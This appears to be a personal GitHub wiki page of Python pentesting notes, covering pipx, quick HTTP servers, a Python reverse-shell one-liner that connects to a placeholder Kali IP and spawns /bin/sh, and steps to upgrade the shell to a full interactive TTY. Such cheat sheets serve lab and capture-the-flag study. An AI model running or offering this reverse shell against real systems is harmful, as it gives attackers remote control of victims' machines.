-
Notifications
You must be signed in to change notification settings - Fork 14
Python
Alvin Smith edited this page Aug 7, 2021
·
18 revisions
This automatically creates a virtual environment, installs the package, and adds the package's associated applications (entry points) to a location on your PATH. For example, pipx install pycowsay makes the pycowsay command available globally, but sandboxes the pycowsay package in its own virtual environment. pipx never needs to run as sudo to do this.
https://github.com/pypa/pipx
https://github.com/A1vinSmith/arbitrary-python
python -m SimpleHTTPServer 80
python3 -m http.server The default port is 8000
- Another netcat listener for the below
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- However this shell still won’t do what we want it to, so we need to get full tty for an interactive shell.
python -c 'import pty; pty.spawn("/bin/bash")'
or
python3 -c 'import pty; pty.spawn("/bin/bash")'
- If phase 2 not make the job done(Python spawn a better-featured bash shell. But still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell).
export TERM=xterm // give us access to term commands such as clear.
- Press CTRL+Z to put the shell in the background. Next, type this command in the same window:
stty raw -echo;fg. This will bring your shell back to the foreground with a fully interactive experience. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
ps: Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.